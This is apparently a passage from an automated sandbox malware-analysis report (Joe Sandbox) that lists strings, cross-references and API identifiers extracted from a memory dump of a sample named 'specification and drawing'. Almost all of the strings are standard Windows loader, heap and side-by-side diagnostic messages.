                                                                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011354CE
                                                                                                          • Critical section address, xrefs: 01135425, 011354BC, 01135534
                                                                                                          • double initialized or corrupted critical section, xrefs: 01135508
                                                                                                          • Critical section debug info address, xrefs: 0113541F, 0113552E
                                                                                                          • 8, xrefs: 011352E3
                                                                                                          • undeleted critical section in freed memory, xrefs: 0113542B
                                                                                                          • Invalid debug info address of this critical section, xrefs: 011354B6
                                                                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 01135543
                                                                                                          • corrupted critical section, xrefs: 011354C2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                          • API String ID: 0-2368682639
                                                                                                          Strings
                                                                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01132602
                                                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011325EB
                                                                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01132498
                                                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01132506
                                                                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01132409
                                                                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011322E4
                                                                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011324C0
                                                                                                          • @, xrefs: 0113259B
                                                                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01132412
                                                                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 0113261F
                                                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01132624
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                          • API String ID: 0-4009184096
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                          • API String ID: 0-2515994595
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                          • API String ID: 0-3197712848
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                          • API String ID: 0-1700792311
                                                                                                          Strings
                                                                                                          • VerifierDebug, xrefs: 01148CA5
                                                                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01148A3D
                                                                                                          • VerifierFlags, xrefs: 01148C50
                                                                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01148A67
                                                                                                          • AVRF: -*- final list of providers -*- , xrefs: 01148B8F
                                                                                                          • VerifierDlls, xrefs: 01148CBD
                                                                                                          • HandleTraces, xrefs: 01148C8F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                          • API String ID: 0-3223716464
                                                                                                          Strings
                                                                                                          • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 01144E38
                                                                                                          • Execute '.cxr %p' to dump context, xrefs: 01144EB1
                                                                                                          • LdrpProtectedCopyMemory, xrefs: 01144DF4
                                                                                                          • ***Exception thrown within loader***, xrefs: 01144E27
                                                                                                          • minkernel\ntdll\ldrutil.c, xrefs: 01144E06
                                                                                                          • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 01144DF5
                                                                                                          • LdrpGenericExceptionFilter, xrefs: 01144DFC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                                                          • API String ID: 0-2973941816
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                          • API String ID: 0-1109411897
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-792281065
                                                                                                          Strings
                                                                                                          • Loading the shim user DLL failed with status 0x%08lx, xrefs: 01119A2A
                                                                                                          • LdrpInitShimEngine, xrefs: 011199F4, 01119A07, 01119A30
                                                                                                          • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 011199ED
                                                                                                          • Getting the shim user exports failed with status 0x%08lx, xrefs: 01119A01
                                                                                                          • apphelp.dll, xrefs: 010B6496
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01119A11, 01119A3A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-204845295
                                                                                                          Strings
                                                                                                          • SXS: %s() passed the empty activation context, xrefs: 01132165
                                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01132178
                                                                                                          • RtlGetAssemblyStorageRoot, xrefs: 01132160, 0113219A, 011321BA
                                                                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0113219F
                                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01132180
                                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011321BF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                          • API String ID: 0-861424205
                                                                                                          Strings
                                                                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 011381E5
                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01138181, 011381F5
                                                                                                          • LdrpInitializeImportRedirection, xrefs: 01138177, 011381EB
                                                                                                          • LdrpInitializeProcess, xrefs: 010FC6C4
                                                                                                          • Loading import redirection DLL: '%wZ', xrefs: 01138170
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 010FC6C3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                          • API String ID: 0-475462383
                                                                                                          APIs
                                                                                                            • Part of subcall function 01102DF0: LdrInitializeThunk.NTDLL ref: 01102DFA
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100BA3
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100BB6
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100D60
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100D74
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 1404860816-0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                          • API String ID: 0-379654539
                                                                                                          Strings
                                                                                                          • @, xrefs: 010F8591
                                                                                                          • LdrpInitializeProcess, xrefs: 010F8422
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 010F8421
                                                                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 010F855E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-1918872054
                                                                                                          Strings
                                                                                                          • SXS: %s() passed the empty activation context, xrefs: 011321DE
                                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011322B6
                                                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011321D9, 011322B1
                                                                                                          • .Local, xrefs: 010F28D8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                          • API String ID: 0-1239276146
                                                                                                          Strings
                                                                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01133456
                                                                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01133437
                                                                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0113342A
                                                                                                          • RtlDeactivateActivationContext, xrefs: 01133425, 01133432, 01133451
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                          • API String ID: 0-1245972979
                                                                                                          Strings
                                                                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011210AE
                                                                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01120FE5
                                                                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0112106B
                                                                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01121028
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                          • API String ID: 0-1468400865
                                                                                                          Strings
                                                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0113362F
                                                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 01133640, 0113366C
                                                                                                          • LdrpFindDllActivationContext, xrefs: 01133636, 01133662
                                                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 0113365C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                          • API String ID: 0-3779518884
                                                                                                          Strings
                                                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0112A992
                                                                                                          • apphelp.dll, xrefs: 010E2462
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0112A9A2
                                                                                                          • LdrpDynamicShimModule, xrefs: 0112A998
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-176724104
                                                                                                          Strings
                                                                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 010D327D
                                                                                                          • HEAP[%wZ]: , xrefs: 010D3255
                                                                                                          • HEAP: , xrefs: 010D3264
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                          • API String ID: 0-617086771
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                          • API String ID: 0-4253913091
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $@
                                                                                                          • API String ID: 0-1077428164
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                                                                          • API String ID: 0-2779062949
                                                                                                          Strings
                                                                                                          • LdrpCheckModule, xrefs: 0112A117
                                                                                                          • Failed to allocated memory for shimmed module list, xrefs: 0112A10F
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0112A121
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-161242083
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                          • API String ID: 0-1334570610
                                                                                                          Strings
                                                                                                          • Failed to reallocate the system dirs string !, xrefs: 011382D7
                                                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 011382DE
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 011382E8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-1783798831
                                                                                                          Strings
                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0117C1C5
                                                                                                          • @, xrefs: 0117C1F1
                                                                                                          • PreferredUILanguages, xrefs: 0117C212
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                          • API String ID: 0-2968386058
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                          • API String ID: 0-1373925480
                                                                                                          Strings
                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01144899
                                                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01144888
                                                                                                          • LdrpCheckRedirection, xrefs: 0114488F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                          • API String ID: 0-3154609507
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                          • API String ID: 0-2558761708
                                                                                                          Strings
                                                                                                          • Process initialization failed with status 0x%08lx, xrefs: 011420F3
                                                                                                          • LdrpInitializationFailure, xrefs: 011420FA
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01142104
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-2986994758
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___swprintf_l
                                                                                                          • String ID: #%u
                                                                                                          • API String ID: 48624451-232158463
                                                                                                          Strings
                                                                                                          • LdrResSearchResource Exit, xrefs: 010CAA25
                                                                                                          • LdrResSearchResource Enter, xrefs: 010CAA13
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                          • API String ID: 0-4066393604
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: `$`
                                                                                                          • API String ID: 0-197956300
                                                                                                          Strings
                                                                                                          Memory Dump Source
